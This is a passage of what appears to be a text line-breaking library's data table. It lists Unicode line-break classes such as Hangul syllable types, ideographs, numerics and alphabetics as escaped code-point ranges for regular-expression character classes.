b\uc11d-\uc137\uc139-\uc153\uc155-\uc16f\uc171-\uc18b\uc18d-\uc1a7\uc1a9-\uc1c3\uc1c5-\uc1df\uc1e1-\uc1fb\uc1fd-\uc217\uc219-\uc233\uc235-\uc24f\uc251-\uc26b\uc26d-\uc287\uc289-\uc2a3\uc2a5-\uc2bf\uc2c1-\uc2db\uc2dd-\uc2f7\uc2f9-\uc313\uc315-\uc32f\uc331-\uc34b\uc34d-\uc367\uc369-\uc383\uc385-\uc39f\uc3a1-\uc3bb\uc3bd-\uc3d7\uc3d9-\uc3f3\uc3f5-\uc40f\uc411-\uc42b\uc42d-\uc447\uc449-\uc463\uc465-\uc47f\uc481-\uc49b\uc49d-\uc4b7\uc4b9-\uc4d3\uc4d5-\uc4ef\uc4f1-\uc50b\uc50d-\uc527\uc529-\uc543\uc545-\uc55f\uc561-\uc57b\uc57d-\uc597\uc599-\uc5b3\uc5b5-\uc5cf\uc5d1-\uc5eb\uc5ed-\uc607\uc609-\uc623\uc625-\uc63f\uc641-\uc65b\uc65d-\uc677\uc679-\uc693\uc695-\uc6af\uc6b1-\uc6cb\uc6cd-\uc6e7\uc6e9-\uc703\uc705-\uc71f\uc721-\uc73b\uc73d-\uc757\uc759-\uc773\uc775-\uc78f\uc791-\uc7ab\uc7ad-\uc7c7\uc7c9-\uc7e3\uc7e5-\uc7ff\uc801-\uc81b\uc81d-\uc837\uc839-\uc853\uc855-\uc86f\uc871-\uc88b\uc88d-\uc8a7\uc8a9-\uc8c3\uc8c5-\uc8df\uc8e1-\uc8fb\uc8fd-\uc917\uc919-\uc933\uc935-\uc94f\uc951-\uc96b\uc96d-\uc987\uc989-\uc9a3\uc9a5-\uc9bf
\uc9c1-\uc9db\uc9dd-\uc9f7\uc9f9-\uca13\uca15-\uca2f\uca31-\uca4b\uca4d-\uca67\uca69-\uca83\uca85-\uca9f\ucaa1-\ucabb\ucabd-\ucad7\ucad9-\ucaf3\ucaf5-\ucb0f\ucb11-\ucb2b\ucb2d-\ucb47\ucb49-\ucb63\ucb65-\ucb7f\ucb81-\ucb9b\ucb9d-\ucbb7\ucbb9-\ucbd3\ucbd5-\ucbef\ucbf1-\ucc0b\ucc0d-\ucc27\ucc29-\ucc43\ucc45-\ucc5f\ucc61-\ucc7b\ucc7d-\ucc97\ucc99-\uccb3\uccb5-\ucccf\uccd1-\ucceb\ucced-\ucd07\ucd09-\ucd23\ucd25-\ucd3f\ucd41-\ucd5b\ucd5d-\ucd77\ucd79-\ucd93\ucd95-\ucdaf\ucdb1-\ucdcb\ucdcd-\ucde7\ucde9-\uce03\uce05-\uce1f\uce21-\uce3b\uce3d-\uce57\uce59-\uce73\uce75-\uce8f\uce91-\uceab\ucead-\ucec7\ucec9-\ucee3\ucee5-\uceff\ucf01-\ucf1b\ucf1d-\ucf37\ucf39-\ucf53\ucf55-\ucf6f\ucf71-\ucf8b\ucf8d-\ucfa7\ucfa9-\ucfc3\ucfc5-\ucfdf\ucfe1-\ucffb\ucffd-\ud017\ud019-\ud033\ud035-\ud04f\ud051-\ud06b\ud06d-\ud087\ud089-\ud0a3\ud0a5-\ud0bf\ud0c1-\ud0db\ud0dd-\ud0f7\ud0f9-\ud113\ud115-\ud12f\ud131-\ud14b\ud14d-\ud167\ud169-\ud183\ud185-\ud19f\ud1a1-\ud1bb\ud1bd-\ud1d7\ud1d9-\ud1f3\ud1f5-\ud20f\ud211-\ud22b\ud22d-\ud247\ud249-\ud263\ud265-\ud27f\ud281-\ud29b\ud29d-\ud2b7\ud2b9-\ud2d3\ud2d5-\ud2ef\ud2f1-\ud30b\ud30d-\ud327\ud329-\ud343\ud345-\ud35f\ud361-\ud37b\ud37d-\ud397\ud399-\ud3b3\ud3b5-\ud3cf\ud3d1-\ud3eb\ud3ed-\ud407\ud409-\ud423\ud425-\ud43f\ud441-\ud45b\ud45d-\ud477\ud479-\ud493\ud495-\ud4af\ud4b1-\ud4cb\ud4cd-\ud4e7\ud4e9-\ud503\ud505-\ud51f\ud521-\ud53b\ud53d-\ud557\ud559-\ud573\ud575-\ud58f\ud591-\ud5ab\ud5ad-\ud5c7\ud5c9-\ud5e3\ud5e5-\ud5ff\ud601-\ud61b\ud61d-\ud637\ud639-\ud653\ud655-\ud66f\ud671-\ud68b\ud68d-\ud6a7\ud6a9-\ud6c3\ud6c5-\ud6df\ud6e1-\ud6fb\ud6fd-\ud717\ud719-\ud733\ud735-\ud74f\ud751-\ud76b\ud76d-\ud787\ud789-\U0010ffff",
"^h3": "\x00-\uac00\uac1c\uac38\uac54\uac70\uac8c\uaca8\uacc4\uace0\uacfc\uad18\uad34\uad50\uad6c\uad88\uada4\uadc0\uaddc\uadf8\uae14\uae30\uae4c\uae68\uae84\uaea0\uaebc\uaed8\uaef4\uaf10\uaf2c\uaf48\uaf64\uaf80\uaf9c\uafb8\uafd4\uaff0\ub00c\ub028\ub044\ub060\ub07c\ub098\ub0b4\ub0d0\ub0ec\ub108\ub124\ub140\ub15c\ub178\ub194\ub1b0\ub1cc\ub1e8\ub204\ub220\ub23c\ub258\ub274\ub290\ub2ac\ub2c8\ub2e4\ub300\ub31c\ub338\ub354\ub370\ub38c\ub3a8\ub3c4\ub3e0\ub3fc\ub418\ub434\ub450\ub46c\ub488\ub4a4\ub4c0\ub4dc\ub4f8\ub514\ub530\ub54c\ub568\ub584\ub5a0\ub5bc\ub5d8\ub5f4\ub610\ub62c\ub648\ub664\ub680\ub69c\ub6b8\ub6d4\ub6f0\ub70c\ub728\ub744\ub760\ub77c\ub798\ub7b4\ub7d0\ub7ec\ub808\ub824\ub840\ub85c\ub878\ub894\ub8b0\ub8cc\ub8e8\ub904\ub920\ub93c\ub958\ub974\ub990\ub9ac\ub9c8\ub9e4\uba00\uba1c\uba38\uba54\uba70\uba8c\ubaa8\ubac4\ubae0\ubafc\ubb18\ubb34\ubb50\ubb6c\ubb88\ubba4\ubbc0\ubbdc\ubbf8\ubc14\ubc30\ubc4c\ubc68\ubc84\ubca0\ubcbc\ubcd8\ubcf4\ubd10\ubd2c\ubd48\ubd64\ubd80\ubd9c\ubdb8\ubdd4\ubdf0\ube0c\ube28\ube44\ube60\ube7c\ube98\ubeb4\ubed0\ubeec\ubf08\ubf24\ubf40\ubf5c\ubf78\ubf94\ubfb0\ubfcc\ubfe8\uc004\uc020\uc03c\uc058\uc074\uc090\uc0ac\uc0c8\uc0e4\uc100\uc11c\uc138\uc154\uc170\uc18c\uc1a8\uc1c4\uc1e0\uc1fc\uc218\uc234\uc250\uc26c\uc288\uc2a4\uc2c0\uc2dc\uc2f8\uc314\uc330\uc34c\uc368\uc384\uc3a0\uc3bc\uc3d8\uc3f4\uc410\uc42c\uc448\uc464\uc480\uc49c\uc4b8\uc4d4\uc4f0\uc50c\uc528\uc544\uc560\uc57c\uc598\uc5b4\uc5d0\uc5ec\uc608\uc624\uc640\uc65c\uc678\uc694\uc6b0\uc6cc\uc6e8\uc704\uc720\uc73c\uc758\uc774\uc790\uc7ac\uc7c8\uc7e4\uc800\uc81c\uc838\uc854\uc870\uc88c\uc8a8\uc8c4\uc8e0\uc8fc\uc918\uc934\uc950\uc96c\uc988\uc9a4\uc9c0\uc9dc\uc9f8\uca14\uca30\uca4c\uca68\uca84\ucaa0\ucabc\ucad8\ucaf4\ucb10\ucb2c\ucb48\ucb64\ucb80\ucb9c\ucbb8\ucbd4\ucbf0\ucc0c\ucc28\ucc44\ucc60\ucc7c\ucc98\uccb4\uccd0\uccec\ucd08\ucd24\ucd40\ucd5c\ucd78\ucd94\ucdb0\ucdcc\ucde8\uce04\uce20\uce3c\uce58\uce74\uce90\uceac\ucec8\ucee4\ucf00\ucf1c\ucf38\ucf54\ucf70\ucf8c\ucfa8\ucfc4\ucfe0\ucffc\ud018\ud034\ud050\ud06c\ud088\ud0a4\ud0c0\ud0dc\ud0f8\ud114\ud130\ud14c\ud168\ud184\ud1a0\ud1bc\ud1d8\ud1f4\ud210\ud22c\ud248\ud264\ud280\ud29c\ud2b8\ud2d4\ud2f0\ud30c\ud328\ud344\ud360\ud37c\ud398\ud3b4\ud3d0\ud3ec\ud408\ud424\ud440\ud45c\ud478\ud494\ud4b0\ud4cc\ud4e8\ud504\ud520\ud53c\ud558\ud574\ud590\ud5ac\ud5c8\ud5e4\ud600\ud61c\ud638\ud654\ud670\ud68c\ud6a8\ud6c4\ud6e0\ud6fc\ud718\ud734\ud750\ud76c\ud788\ud7a4-\U0010ffff",
"^hl": "\x00-\u05cf\u05eb-\u05ef\u05f3-\ufb1c\ufb1e\ufb29\ufb37\ufb3d\ufb3f\ufb42\ufb45\ufb50-\U0010ffff",
"^hy": "\x00-\x2c\x2e-\U0010ffff",
"^id": "\x00-\u2e7f\u2e9a\u2ef4-\u2eff\u2fd6-\u2fef\u2ffc-\u2fff\u3001-\u3002\u3005\u3008-\u3011\u3014-\u301f\u302a-\u302f\u303b-\u303c\u3040-\u3041\u3043\u3045\u3047\u3049\u3063\u3083\u3085\u3087\u308e\u3095-\u309e\u30a0-\u30a1\u30a3\u30a5\u30a7\u30a9\u30c3\u30e3\u30e5\u30e7\u30ee\u30f5-\u30f6\u30fb-\u30fe\u3100-\u3104\u312e-\u3130\u318f\u31bb-\u31bf\u31e4-\u31ff\u321f\u3248-\u324f\u32ff\u4dc0-\u4dff\ua015\ua48d-\ua48f\ua4c7-\uf8ff\ufb00-\ufe2f\ufe35-\ufe44\ufe47-\ufe48\ufe50\ufe52-\ufe57\ufe59-\ufe5e\ufe67\ufe69-\ufe6a\ufe6c-\uff01\uff04-\uff05\uff08-\uff09\uff0c\uff0e\uff1a-\uff1b\uff1f\uff3b\uff3d\uff5b\uff5d\uff5f-\uffe1\uffe5-\U0001afff\U0001b002-\U0001f1ff\U0001f203-\U0001f20f\U0001f23b-\U0001f23f\U0001f249-\U0001f24f\U0001f252-\U0001ffff\U0002fffe-\U0002ffff\U0003fffe-\U0010ffff",
"^in": "\x00-\u2023\u2027-\ufe18\ufe1a-\U0010ffff",
"^is": "\x00-\x2b\x5c\x2d\x2f-\x39\x3c-\u037d\u037f-\u0588\u058a-\u060b\u060e-\u07f7\u07f9-\u2043\u2045-\ufe0f\ufe11-\ufe12\ufe15-\U0010ffff",
"^jl": "\x00-\u10ff\u1160-\ua95f\ua97d-\U0010ffff",
"^jt": "\x00-\u11a7\u1200-\ud7ca\ud7fc-\U0010ffff",
"^jv": "\x00-\u115f\u11a8-\ud7af\ud7c7-\U0010ffff",
"^lf": "\x00-\x09\x0b-\U0010ffff",
"^nl": "\x00-\x84\x86-\U0010ffff",
"^ns": "\x00-\u17d5\u17d7-\u203b\u203e-\u2046\u204a-\u3004\u3006-\u301b\u301d-\u303a\u303d-\u309a\u309f\u30a1-\u30fa\u30fc\u30ff-\ua014\ua016-\ufe53\ufe56-\uff19\uff1c-\uff64\uff66-\uff9d\uffa0-\U0010ffff",
"^nu": "\x00-\x2f\x3a-\u065f\u066a\u066d-\u06ef\u06fa-\u07bf\u07ca-\u0965\u0970-\u09e5\u09f0-\u0a65\u0a70-\u0ae5\u0af0-\u0b65\u0b70-\u0be5\u0bf0-\u0c65\u0c70-\u0ce5\u0cf0-\u0d65\u0d70-\u0e4f\u0e5a-\u0ecf\u0eda-\u0f1f\u0f2a-\u103f\u104a-\u108f\u109a-\u17df\u17ea-\u180f\u181a-\u1945\u1950-\u19cf\u19da-\u1a7f\u1a8a-\u1a8f\u1a9a-\u1b4f\u1b5a-\u1baf\u1bba-\u1c3f\u1c4a-\u1c4f\u1c5a-\ua61f\ua62a-\ua8cf\ua8da-\ua8ff\ua90a-\ua9cf\ua9da-\uaa4f\uaa5a-\uabef\uabfa-\U0001049f\U000104aa-\U00011065\U00011070-\U000110ef\U000110fa-\U00011135\U00011140-\U000111cf\U000111da-\U000116bf\U000116ca-\U0001d7cd\U0001d800-\U0010ffff",
"^op": "\x00-\x27\x29-\x5a\x5c\x5c-\x7a\x5c\x7c-\xa0\xa2-\xbe\xc0-\u0f39\u0f3b\u0f3d-\u169a\u169c-\u2019\u201b-\u201d\u201f-\u2044\u2046-\u207c\u207e-\u208c\u208e-\u2328\u232a-\u2767\u2769\u276b\u276d\u276f\u2771\u2773\u2775-\u27c4\u27c6-\u27e5\u27e7\u27e9\u27eb\u27ed\u27ef-\u2982\u2984\u2986\u2988\u298a\u298c\u298e\u2990\u2992\u2994\u2996\u2998-\u29d7\u29d9\u29db-\u29fb\u29fd-\u2e17\u2e19-\u2e21\u2e23\u2e25\u2e27\u2e29-\u3007\u3009\u300b\u300d\u300f\u3011-\u3013\u3015\u3017\u3019\u301b-\u301c\u301e-\ufd3d\ufd3f-\ufe16\ufe18-\ufe34\ufe36\ufe38\ufe3a\ufe3c\ufe3e\ufe40\ufe42\ufe44-\ufe46\ufe48-\ufe58\ufe5a\ufe5c\ufe5e-\uff07\uff09-\uff3a\uff3c-\uff5a\uff5c-\uff5e\uff60-\uff61\uff63-\U00013257\U0001325b-\U00013285\U00013287\U00013289-\U00013378\U0001337a-\U0010ffff",
"^po": "\x00-\x24\x5c\x26-\xa1\xa3-\xaf\xb1-\u0608\u060c-\u0669\u066b-\u09f1\u09f4-\u09f8\u09fa-\u0d78\u0d7a-\u202f\u2038-\u20a6\u20a8-\u20b5\u20b7-\u2102\u2104-\u2108\u210a-\ua837\ua839-\ufdfb\ufdfd-\ufe69\ufe6b-\uff04\uff06-\uffdf\uffe1-\U0010ffff",
"^pr": "\x00-\x23\x25-\x2a\x2c-\x5c\x5b\x5c\x5d-\xa2\xa6-\xb0\xb2-\u058e\u0590-\u09fa\u09fc-\u0af0\u0af2-\u0bf8\u0bfa-\u0e3e\u0e40-\u17da\u17dc-\u209f\u20a7\u20b6\u20ba-\u2115\u2117-\u2211\u2214-\ufe68\ufe6a-\uff03\uff05-\uffe0\uffe2-\uffe4\uffe7-\U0010ffff",
"^qu": "\x00-\x21\x23-\x5c\x26\x28-\xaa\xac-\xba\xbc-\u2017\u201a\u201e\u2020-\u2038\u203b-\u275a\u275f-\u2dff\u2e0e-\u2e1b\u2e1e-\u2e1f\u2e22-\U0010ffff",
"^sa": "\x00-\u0e00\u0e3b-\u0e3f\u0e4f-\u0e80\u0e83\u0e85-\u0e86\u0e89\u0e8b-\u0e8c\u0e8e-\u0e93\u0e98\u0ea0\u0ea4\u0ea6\u0ea8-\u0ea9\u0eac\u0eba\u0ebe-\u0ebf\u0ec5\u0ec7\u0ece-\u0edb\u0ee0-\u0fff\u1040-\u104f\u1090-\u1099\u10a0-\u177f\u17d4-\u17d6\u17d8-\u17db\u17de-\u194f\u196e-\u196f\u1975-\u197f\u19ac-\u19af\u19ca-\u19d9\u19db-\u19dd\u19e0-\u1a1f\u1a5f\u1a7d-\u1a9f\u1aae-\uaa5f\uaa7c-\uaa7f\uaac3-\uaada\uaae0-\U0010ffff",
"^sg": "\x00-\ud7ff\ue000-\U0010ffff",
"^sp": "\x00-\x1f\x21-\U0010ffff",
"^sy": "\x00-\x2e\x30-\U0010ffff",
"^wj": "\x00-\u205f\u2061-\ufefe\uff00-\U0010ffff",
"^xx": "\x00-\u0377\u037a-\u037e\u0384-\u038a\u038c\u038e-\u03a1\u03a3-\u0527\u0531-\u0556\u0559-\u055f\u0561-\u0587\u0589-\u058a\u058f\u0591-\u05c7\u05d0-\u05ea\u05f0-\u05f4\u0600-\u0604\u0606-\u061b\u061e-\u070d\u070f-\u074a\u074d-\u07b1\u07c0-\u07fa\u0800-\u082d\u0830-\u083e\u0840-\u085b\u085e\u08a0\u08a2-\u08ac\u08e4-\u08fe\u0900-\u0977\u0979-\u097f\u0981-\u0983\u0985-\u098c\u098f-\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bc-\u09c4\u09c7-\u09c8\u09cb-\u09ce\u09d7\u09dc-\u09dd\u09df-\u09e3\u09e6-\u09fb\u0a01-\u0a03\u0a05-\u0a0a\u0a0f-\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32-\u0a33\u0a35-\u0a36\u0a38-\u0a39\u0a3c\u0a3e-\u0a42\u0a47-\u0a48\u0a4b-\u0a4d\u0a51\u0a59-\u0a5c\u0a5e\u0a66-\u0a75\u0a81-\u0a83\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2-\u0ab3\u0ab5-\u0ab9\u0abc-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ad0\u0ae0-\u0ae3\u0ae6-\u0af1\u0b01-\u0b03\u0b05-\u0b0c\u0b0f-\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32-\u0b33\u0b35-\u0b39\u0b3c-\u0b44\u0b47-\u0b48\u0b4b-\u0b4d\u0b56-\u0b57\u0b5c-\u0b5d\u0b5f-\u0b63\u0b66-\u0b77\u0b82-\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99-\u0b9a\u0b9c\u0b9e-\u0b9f\u0ba3-\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd0\u0bd7\u0be6-\u0bfa\u0c01-\u0c03\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d-\u0c44\u0c46-\u0c48\u0c4a-\u0c4d\u0c55-\u0c56\u0c58-\u0c59\u0c60-\u0c63\u0c66-\u0c6f\u0c78-\u0c7f\u0c82-\u0c83\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbc-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5-\u0cd6\u0cde\u0ce0-\u0ce3\u0ce6-\u0cef\u0cf1-\u0cf2\u0d02-\u0d03\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d-\u0d44\u0d46-\u0d48\u0d4a-\u0d4e\u0d57\u0d60-\u0d63\u0d66-\u0d75\u0d79-\u0d7f\u0d82-\u0d83\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2-\u0df4\u0e01-\u0e3a\u0e3f-\u0e5b\u0e81-\u0e82\u0e84\u0e87-\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa-\u0eab\u0ead-\u0eb9\u0ebb-\u0ebd\u0ec0-\u0ec4\u0ec6\u0ec8-\u0ecd\u0ed0-\u0ed9\u0edc-\u0edf\u0f00-\u0f47\u0f49-\u0f6c\u0f71-\u0f97\u0f99-\u0fbc\u0fbe-\u0fcc\u0fce-\u0fda\u1000-\u10c5\u10c7\u10cd\u10d0-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u135d-\u137c\u1380-\u1399\u13a0-\u13f4\u1400-\u169c\u16a0-\u16f0\u1700-\u170c\u170e-\u1714\u1720-\u1736\u1740-\u1753\u1760-\u176c\u176e-\u1770\u1772-\u1773\u1780-\u17dd\u17e0-\u17e9\u17f0-\u17f9\u1800-\u180e\u1810-\u1819\u1820-\u1877\u1880-\u18aa\u18b0-\u18f5\u1900-\u191c\u1920-\u192b\u1930-\u193b\u1940\u1944-\u196d\u1970-\u1974\u1980-\u19ab\u19b0-\u19c9\u19d0-\u19da\u19de-\u1a1b\u1a1e-\u1a5e\u1a60-\u1a7c\u1a7f-\u1a89\u1a90-\u1a99\u1aa0-\u1aad\u1b00-\u1b4b\u1b50-\u1b7c\u1b80-\u1bf3\u1bfc-\u1c37\u1c3b-\u1c49\u1c4d-\u1c7f\u1cc0-\u1cc7\u1cd0-\u1cf6\u1d00-\u1de6\u1dfc-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fc4\u1fc6-\u1fd3\u1fd6-\u1fdb\u1fdd-\u1fef\u1ff2-\u1ff4\u1ff6-\u1ffe\u2000-\u2064\u206a-\u2071\u2074-\u208e\u2090-\u209c\u20a0-\u20b9\u20d0-\u20f0\u2100-\u2189\u2190-\u23f3\u2400-\u2426\u2440-\u244a\u2460-\u26ff\u2701-\u2b4c\u2b50-\u2b59\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2cf3\u2cf9-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f-\u2d70\u2d7f-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2de0-\u2e3b\u2e80-\u2e99\u2e9b-\u2ef3\u2f00-\u2fd5\u2f
f0-\u2ffb\u3000-\u303f\u3041-\u3096\u3099-\u30ff\u3105-\u312d\u3131-\u318e\u3190-\u31ba\u31c0-\u31e3\u31f0-\u321e\u3220-\u32fe\u3300-\ua48c\ua490-\ua4c6\ua4d0-\ua62b\ua640-\ua697\ua69f-\ua6f7\ua700-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua82b\ua830-\ua839\ua840-\ua877\ua880-\ua8c4\ua8ce-\ua8d9\ua8e0-\ua8fb\ua900-\ua953\ua95f-\ua97c\ua980-\ua9cd\ua9cf-\ua9d9\ua9de-\ua9df\uaa00-\uaa36\uaa40-\uaa4d\uaa50-\uaa59\uaa5c-\uaa7b\uaa80-\uaac2\uaadb-\uaaf6\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabed\uabf0-\uabf9\uac00-\ud7a3\ud7b0-\ud7c6\ud7cb-\ud7fb\ud800-\udfff\uf900-\ufb06\ufb13-\ufb17\ufb1d-\ufb36\ufb38-\ufb3c\ufb3e\ufb40-\ufb41\ufb43-\ufb44\ufb46-\ufbc1\ufbd3-\ufd3f\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfd\ufe00-\ufe19\ufe20-\ufe26\ufe30-\ufe52\ufe54-\ufe66\ufe68-\ufe6b\ufe70-\ufe74\ufe76-\ufefc\ufeff\uff01-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc\uffe0-\uffe6\uffe8-\uffee\ufff9-\ufffd\U00010000-\U0001000b\U0001000d-\U00010026\U00010028-\U0001003a\U0001003c-\U0001003d\U0001003f-\U0001004d\U00010050-\U0001005d\U00010080-\U000100fa\U00010100-\U00010102\U00010107-\U00010133\U00010137-\U0001018a\U00010190-\U0001019b\U000101d0-\U000101fd\U00010280-\U0001029c\U000102a0-\U000102d0\U00010300-\U0001031e\U00010320-\U00010323\U00010330-\U0001034a\U00010380-\U0001039d\U0001039f-\U000103c3\U000103c8-\U000103d5\U00010400-\U0001049d\U000104a0-\U000104a9\U00010800-\U00010805\U00010808\U0001080a-\U00010835\U00010837-\U00010838\U0001083c\U0001083f-\U00010855\U00010857-\U0001085f\U00010900-\U0001091b\U0001091f-\U00010939\U0001093f\U00010980-\U000109b7\U000109be-\U000109bf\U00010a00-\U00010a03\U00010a05-\U00010a06\U00010a0c-\U00010a13\U00010a15-\U00010a17\U00010a19-\U00010a33\U00010a38-\U00010a3a\U00010a3f-\U00010a47\U00010a50-\U00010a58\U00010a60-\U00010a7f\U00010b00-\U00010b35\U00010b39-\U00010b55\U00010b58-\U00010b72\U00010b78-\U00010b7f\U00010c00-\U00010c48\U00010e60-\U00010e7e\U00011000-\U0001104d\U00011052-\U0001106f\U00011080-\U000110c1\U000110d0-\U000110e8\U000110f0-\U000110f9\U00011100-\U00011134\U00011136-\U00011143\U00011180-\U000111c8\U000111d0-\U000111d9\U00011680-\U000116b7\U000116c0-\U000116c9\U00012000-\U0001236e\U00012400-\U00012462\U00012470-\U00012473\U00013000-\U0001342e\U00016800-\U00016a38\U00016f00-\U00016f44\U00016f50-\U00016f7e\U00016f8f-\U00016f9f\U0001b000-\U0001b001\U0001d000-\U0001d0f5\U0001d100-\U0001d126\U0001d129-\U0001d1dd\U0001d200-\U0001d245\U0001d300-\U0001d356\U0001d360-\U0001d371\U0001d400-\U0001d454\U0001d456-\U0001d49c\U0001d49e-\U0001d49f\U0001d4a2\U0001d4a5-\U0001d4a6\U0001d4a9-\U0001d4ac\U0001d4ae-\U0001d4b9\U0001d4bb\U0001d4bd-\U0001d4c3\U0001d4c5-\U0001d505\U0001d507-\U0001d50a\U0001d50d-\U0001d514\U0001d516-\U0001d51c\U0001d51e-\U0001d539\U0001d53b-\U0001d53e\U0001d540-\U0001d544\U0001d546\U0001d54a-\U0001d550\U0001d552-\U0001d6a5\U0001d6a8-\U0001d7cb\U0001d7ce-\U0001d7ff\U0001ee00-\U0001ee03\U0001ee05-\U0001ee1f\U0001ee21-\U0001ee22\U0001ee24\U0001ee27\U0001ee29-\U0001ee32\U0001ee34-\U0001ee37\U0001ee39\U0001ee3b\U0001ee42\U0001ee47\U0001ee49\U0001ee4b\U0001ee4d-\U0001ee4f\U0001ee51-\U0001ee52\U0001ee54\U0001ee57\U0001ee59\U0001ee5b\U0001ee5d\U0001ee5f\U0001ee61-\U0001ee62\U0001ee64\U0001ee67-\U0001ee6a\U0001ee6c-\U0001ee72\U0001ee74-\U0001ee77\U0001ee79-\U0001ee7c\U0001ee7e\U0001ee80-\U0001ee89\U0001ee8b-\U0001ee9b\U0001eea1-\U0001eea3\U0001eea5-\U0001eea9\U0001eeab-\U0001eebb\U0001eef0-\U0001eef1\U0001f000-\U0001f02b\U0001f030-\U0001f093\U0001f0a0-\U0001f0ae\U0001f0b1-\U0001f0be\U0001f0c1-\U0001f0cf\U0001f0d1-\U0001f
0df\U0001f100-\U0001f10a\U0001f110-\U0001f12e\U0001f130-\U0001f16b\U0001f170-\U0001f19a\U0001f1e6-\U0001f202\U0001f210-\U0001f23a\U0001f240-\U0001f248\U0001f250-\U0001f251\U0001f300-\U0001f320\U0001f330-\U0001f335\U0001f337-\U0001f37c\U0001f380-\U0001f393\U0001f3a0-\U0001f3c4\U0001f3c6-\U0001f3ca\U0001f3e0-\U0001f3f0\U0001f400-\U0001f43e\U0001f440\U0001f442-\U0001f4f7\U0001f4f9-\U0001f4fc\U0001f500-\U0001f53d\U0001f540-\U0001f543\U0001f550-\U0001f567\U0001f5fb-\U0001f640\U0001f645-\U0001f64f\U0001f680-\U0001f6c5\U0001f700-\U0001f773\U00020000-\U0002fffd\U00030000-\U0003fffd\U000e0001\U000e0020-\U000e007f\U000e0100-\U000e01ef",
"^zw": "\x00-\u200a\u200c-\U0010ffff",
"ai": "\xa7-\xa8\xaa\xb2-\xb3\xb6-\xba\xbc-\xbe\xd7\xf7\u02c7\u02c9-\u02cb\u02cd\u02d0\u02d8-\u02db\u02dd\u2015-\u2016\u2020-\u2021\u203b\u2074\u207f\u2081-\u2084\u2105\u2113\u2121-\u2122\u212b\u2154-\u2155\u215b\u215e\u2160-\u216b\u2170-\u2179\u2189\u2190-\u2199\u21d2\u21d4\u2200\u2202-\u2203\u2207-\u2208\u220b\u220f\u2211\u2215\u221a\u221d-\u2220\u2223\u2225\u2227-\u222c\u222e\u2234-\u2237\u223c-\u223d\u2248\u224c\u2252\u2260-\u2261\u2264-\u2267\u226a-\u226b\u226e-\u226f\u2282-\u2283\u2286-\u2287\u2295\u2299\u22a5\u22bf\u2312\u2460-\u24fe\u2500-\u254b\u2550-\u2574\u2580-\u258f\u2592-\u2595\u25a0-\u25a1\u25a3-\u25a9\u25b2-\u25b3\u25b6-\u25b7\u25bc-\u25bd\u25c0-\u25c1\u25c6-\u25c8\u25cb\u25ce-\u25d1\u25e2-\u25e5\u25ef\u2605-\u2606\u2609\u260e-\u260f\u2614-\u2617\u261c\u261e\u2640\u2642\u2660-\u2661\u2663-\u2665\u2667-\u266a\u266c-\u266d\u266f\u269e-\u269f\u26be-\u26bf\u26c4-\u26cd\u26cf-\u26e1\u26e3\u26e8-\u26ff\u2757\u2776-\u2793\u2b55-\u2b59\u3248-\u324f\ufffd\U0001f100-\U0001f10a\U0001f110-\U0001f12d\U0001f130-\U0001f169\U0001f170-\U0001f19a",
"al": "\x23\x5c\x26\x2a\x3c-\x3e\x40-\x5a\x5c\x5e-\x7a\x5c\x7e\xa6\xa9\xac\xae-\xaf\xb5\xc0-\xd6\xd8-\xf6\xf8-\u02c6\u02ce-\u02cf\u02d1-\u02d7\u02dc\u02de\u02e0-\u02ff\u0370-\u0377\u037a-\u037d\u0384-\u038a\u038c\u038e-\u03a1\u03a3-\u0482\u048a-\u0527\u0531-\u0556\u0559-\u055f\u0561-\u0587\u05c0\u05c3\u05f3-\u05f4\u0600-\u0604\u0606-\u0608\u060e-\u060f\u0620-\u064a\u066d-\u066f\u0671-\u06d3\u06d5\u06dd-\u06de\u06e5-\u06e6\u06e9\u06ee-\u06ef\u06fa-\u070d\u070f-\u0710\u0712-\u072f\u074d-\u07a5\u07b1\u07ca-\u07ea\u07f4-\u07f7\u07fa\u0800-\u0815\u081a\u0824\u0828\u0830-\u083e\u0840-\u0858\u085e\u08a0\u08a2-\u08ac\u0904-\u0939\u093d\u0950\u0958-\u0961\u0970-\u0977\u0979-\u097f\u0985-\u098c\u098f-\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bd\u09ce\u09dc-\u09d